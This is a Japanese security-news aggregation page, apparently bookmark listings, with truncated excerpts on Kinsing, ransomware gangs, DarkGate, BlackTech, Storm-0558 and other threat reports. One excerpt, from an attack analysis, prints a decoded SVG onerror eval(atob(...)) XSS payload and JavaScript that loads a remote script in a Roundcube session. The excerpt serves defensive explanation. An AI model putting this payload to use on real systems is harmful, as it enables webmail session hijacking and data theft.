クラウドインフラを狙い、コインマイナーを実行することで知られるマルウェア「Kinsing」が、「Apache Tomcat」をあらたなターゲットとしていることがわかった。 「Kinsing」は、暗号資産(仮想通貨)のマイニングを行うコインマイナーの「h2miner」を実行したり、他コンテナやホストにマルウェアを拡散することでも知られるGo言語ベースのマルウェア。 これまでも、WordPress向けプラグインに判明した脆弱性「CVE-2020-25213」を悪用した攻撃や、設定ミスにより開放された「Docker」のAPIポートを狙い、悪意あるコンテナを起動するといった攻撃が確認されている。 さらには「Apache ActiveMQ」の脆弱性「CVE-2023-46604」を突く活動や、「GNU Cライブラリ(glibc)」に判明した「Looney Tunables」としても知られる権限昇格の
■はじめに 情報窃取を伴うランサムギャングのリークサイトを観察しはじめたのは、コロナ禍と言われ始めた2020年頃でもう4年ほどが経ちました。過去には何度かその観察結果をまとめたエントリを書きました。お恥ずかしながら昨年、かまけてしまい2022年の振り返りを書くことができなかったので今年は書いてみようとふと思い立ってこれを書き始めています。(以後、出てくる数字はあくまでリークサイトの観察から自身が確認できたものですので実際の被害の件数とは異なることに注意してください) ■何を観察してきたか 観察の対象は、基本的にランサムギャングのリークサイトです。昨今のランサム攻撃は、皆さんがご存じの通りファイルやシステムのロックだけではなく、情報窃取型の脅迫や場合によっては身代金の支払いを急かすためにDDoSを行ったり、窃取した情報を元に利害関係者に連絡するというケースもあります。様々な方法で脅迫を行って
BattleRoyalは、脅威アクターです。 この脅威アクターの活動が活発化しています。 短い期間で考えると、特定の脅威アクターが使用する作戦は1つである場合が良くあるのですが、BattleRoyalは複数の作戦を短い期間に展開している動きとなっています。 TDSを使用したキャンペーン TDSはトラフィック配信システムです。 従来から、TDSはエクスプロイトキットの実行チェーンに不可欠な要素として悪用されてきました。 攻撃に気づいていないユーザーを正規のサイトでない「ランディングページ」にリダイレクトした上で、コンピューターのフィンガープリントを取得し、可能であればエクスプロイトを展開するために使用されます。 従来はエクスプロイトキットの一部としてダークウェブで販売されることが多かったのですが、状況の変化で、TDS部分を主体とした商品としてダークウェブで宣伝されるような状況になっています。
useタグのhref属性でbase64エンコードされた値を復号したところ、次のようになりました。 <svg id="x" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="eval(atob('<base64-encoded payload>'))" /></svg> href属性のx値の引数が有効なURLでないため、このオブジェクトのonerror属性が有効になります。onerror属性のペイロードを復号すると、以下のJavaScriptコード(悪意のあるURLは手動で変更しています)が得られました。このJavaScriptコードは、被害者のブラウザでRoundcubeセッションの権限で実行されます。 var fe=document.createElement('script');fe.src="https://re
「Alphv」あるいは「BlackCat」という名前で知られるランサムウェアグループが、金融機関・消費者向けのデータ企業であるMeridianLinkの顧客データと運用情報を盗み出し、身代金を要求しました。さらに、MeridianLinkがランサムウェアにデータを乗っ取られた事実を公表しなかったとして、アメリカ証券取引委員会(SEC)に苦情を申し立てました。 Ransomware Group Files SEC Complaint Over Victim's Failure to Disclose Data Breach - SecurityWeek https://www.securityweek.com/ransomware-group-files-sec-complaint-over-victims-failure-to-disclose-data-breach/ AlphV fil
*詳細データについてはレポートをご参照ください。 離散民族コミュニティへのフォーカスを強めるロシアと中国 ロシアも中国も、さまざまな離散民族コミュニティに対する影響工作を拡大しています。ロシアは、世界のウクライナ人コミュニティを威嚇し、さまざまな国、特にポーランドやバルト三国の戦争難民と受け入れ側のコミュニティの間に不信感を植え付けることを目指しています。それに対して中国は、秘密のプロパガンダを広めるために、数十のプラットフォームにわたって連携したアカウントの大規模なネットワークを展開しています。そこでは、世界の中国語圏などのコミュニティを直接ターゲットにして、米国の政府機関を誹謗中傷し、何百人もの多言語インフルエンサーを通じて中国のポジティブなイメージを宣伝しています。 影響工作とサイバー攻撃の融合 国家支援アクターが、自分の望むプロパガンダを広めるために、サイバー作戦と並行して影響工作
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます フィンランドに拠点を置くセキュリティ企業WithSecureの日本法人ウィズセキュアは10月24日、リモートアクセスのトロイの木馬(RAT)「DarkGate」の攻撃を追跡し、ベトナムを拠点に活動するサイバー攻撃グループが関与しているとのリサーチ結果を発表した。 DarkGateは、多様なユーザーベースと機能を備えているRAT。少なくとも2018年にはサイバー攻撃に使用され始めており、現在はサービスとしてのマルウェア(MaaS)として複数のサイバー犯罪グループに供給され、情報窃取、クリプトジャッキング、ランサムウェアの攻撃キャンペーンで観測されているという。 WithSecureは、英国、米国、インドの企業・団体へのDarkGateを使
アメリカの連邦捜査局(FBI)、国家安全保障局(NSA)、サイバーセキュリティ・社会基盤安全保障庁(CISA)および日本の内閣サイバーセキュリティセンター(NISC)と警察庁が合同で、中国政府により支援されているハッカー集団「BlackTech(ブラックテック)」によるサイバー攻撃についての注意喚起を発表しました。 People's Republic of China-Linked Cyber Actors Hide in Router Firmware | CISA https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-270a 中国を背景とするサイバー攻撃グループ BlackTech によるサイバー攻撃について(注意喚起) (PDFファイル)https://www.nisc.go.jp/pdf/press/2023
2023年7月に中国のハッカー集団がアメリカの政府組織のメールアカウントに不正アクセスしていたことが報じられました。新たに、アメリカ国務省がエリック・シュミット上院議員らの質問に答える形で「中国のハッキンググループによって国務省のメールアカウント10件が侵害され、6万通のメールが盗み出された」という大規模な被害を明らかにしました。 Chinese hackers stole 60,000 emails from senior State Department officials in May, source says | CNN Politics https://edition.cnn.com/2023/09/28/politics/china-hackers-state-department-emails-senate-briefing/index.html 2023年7月にMicros
2023年7月のランサムウェア攻撃件数は、「Cl0p」ランサムウェアグループが「MOVEit」ソフトウェアに潜んでいたゼロデイ脆弱性を悪用するキャンペーンを展開したこともあり、過去最高を記録した。 NCC Groupのグローバル脅威インテリジェンスチームが新たに公開したレポートによると、ランサムウェアを用いたサイバー攻撃による重大インシデント数は、7月に502件と過去最高を記録した。この値は2022年7月の198件と比較すると154%増に相当するという。 また、2023年7月の件数は同年6月の434件と比較すると16%増となっている。 NCC Groupはこの件数の多さについて、Cl0pグループの活動によるところが大きいとしている。Cl0pは「MOVEit」ソフトウェアの脆弱性に対する攻撃で悪名をはせているサイバー犯罪者グループだ。 Cl0pグループとは Lace Tempestグループと
大企業に対するランサムウェア攻撃が見出しを占めることがよくあります。Kaseya、コロニアルパイプライン、MOVEitのような組織に対する知名度の高い攻撃は、ランサムウェアのギャングが狙うのは大企業だけだと思わせるかもしれません。私たちの調査によると、ここれが常に当てはまるわけではありません。 大規模な組織だけが危険にさらされていると考えていると、攻撃を受ける可能性を過小評価することになりかねません。最近のランサムウェアインシデントの分析を利用して、あなたの組織が他のランサムウェア被害者と類似していることを確認し、攻撃が発生する前にサイバーセキュリティのギャップを埋めることができるようにしましょう。 私たちの調査とランサムウェア攻撃の構造について詳しくは 、南北アメリカで8月23日、EMEAとAPACで8月24日に開催されたRansomware Detection and Response
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます Microsoftは米国時間7月11日、中国を拠点とする脅威アクターによる攻撃を緩和したことを公表した。同社はこの脅威アクターを「Storm-0558」として追跡している。Storm-0558は、電子メールを標的としており、スパイ活動、データ窃取、認証情報へのアクセスなどの目的で、主に西欧の政府機関をターゲットにしているという。 同社は、6月16日に顧客から寄せられた情報を基に、異常な電子メールアクティビティーの調査を開始した。その後、Storm-0558が5月15日以降、政府機関を含む約25の組織の電子メールアカウントと、それらの組織に関連していると思われる個人のコンシューマー向けアカウントに不正アクセスしたことが明らかになったという
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く